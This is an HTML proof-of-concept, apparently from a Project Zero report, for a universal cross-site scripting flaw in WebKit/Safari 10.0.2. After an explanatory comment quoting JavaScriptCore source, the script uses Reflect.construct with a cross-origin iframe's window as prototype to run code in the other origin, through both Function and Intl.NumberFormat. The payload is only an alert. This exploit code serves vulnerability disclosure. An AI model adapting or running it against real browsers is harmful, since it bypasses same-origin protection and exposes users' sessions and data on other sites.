<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1084 When creating an object in Javascript, its |Structure| is created with the constructor's prototype's |VM|. Here's some snippets of that routine. Structure* InternalFunction::createSubclassStructure(ExecState* exec, JSValue newTarget, Structure* baseClass) { ... if (newTarget && newTarget != exec->jsCallee()) { // newTarget may be an InternalFunction if we were called from Reflect.construct. JSFunction* targetFunction = jsDynamicCast<JSFunction*>(newTarget); if (LIKELY(targetFunction)) { ... return targetFunction->rareData(vm)->createInternalFunctionAllocationStructureFromBase(vm, prototype, baseClass); ... } else { ... return vm.prototypeMap.emptyStructureForPrototypeFromBaseStructure(prototype, baseClass); ... } } return baseClass; } inline Structure* PrototypeMap::createEmptyStructure(JSObject* prototype, const TypeInfo& typeInfo, const ClassInfo* classInfo, IndexingType indexingType, unsigned inlineCapacity) { ... Structure* structure = Structure::create( prototype->globalObject()->vm(), prototype->globalObject(), prototype, typeInfo, classInfo, indexingType, inlineCapacity); m_structures.set(key, Weak<Structure>(structure)); ... } As we can see |Structure::create| is called with prototype's |vm| and |globalObject| as arguments. So it could lead to an UXSS condition. Tested on Safari 10.0.2(12602. and Webkit Nightly 10.0.2(12602., r210800). More simple way: let f = document.body.appendChild(document.createElement('iframe')); f.onload = () => { f.onload = null; let g = function () {}; g.prototype = f.contentWindow; let a = Reflect.construct(Function, ['return window[0].eval;'], g); let e = a(); e('alert(location)'); }; f.src = 'https://abc.xyz/'; --> <body> <script> /* When creating an object in Javascript, its |Structure| is created with the constructor's prototype's |VM|. Here's some snippets of that routine. Structure* InternalFunction::createSubclassStructure(ExecState* exec, JSValue newTarget, Structure* baseClass) { ... if (newTarget && newTarget != exec->jsCallee()) { // newTarget may be an InternalFunction if we were called from Reflect.construct. JSFunction* targetFunction = jsDynamicCast<JSFunction*>(newTarget); if (LIKELY(targetFunction)) { ... return targetFunction->rareData(vm)->createInternalFunctionAllocationStructureFromBase(vm, prototype, baseClass); ... } else { ... return vm.prototypeMap.emptyStructureForPrototypeFromBaseStructure(prototype, baseClass); ... } } return baseClass; } inline Structure* PrototypeMap::createEmptyStructure(JSObject* prototype, const TypeInfo& typeInfo, const ClassInfo* classInfo, IndexingType indexingType, unsigned inlineCapacity) { ... Structure* structure = Structure::create( prototype->globalObject()->vm(), prototype->globalObject(), prototype, typeInfo, classInfo, indexingType, inlineCapacity); m_structures.set(key, Weak<Structure>(structure)); ... } As we can see |Structure::create| is called with prototype's |vm| and |globalObject| as arguments. So it could lead to an UXSS condition. Tested on Safari 10.0.2(12602. and Webkit Nightly 10.0.2(12602., r210800). */ 'use strict'; function main() { let f = document.body.appendChild(document.createElement('iframe')); f.onload = () => { f.onload = null; let g = function () {}; g.prototype = f.contentWindow; let a = Reflect.construct(Intl.NumberFormat, [], g); Intl.NumberFormat.prototype.__lookupGetter__("format").call(a).constructor('alert(location)')(); }; f.src = 'https://abc.xyz/'; } main(); </script> </body>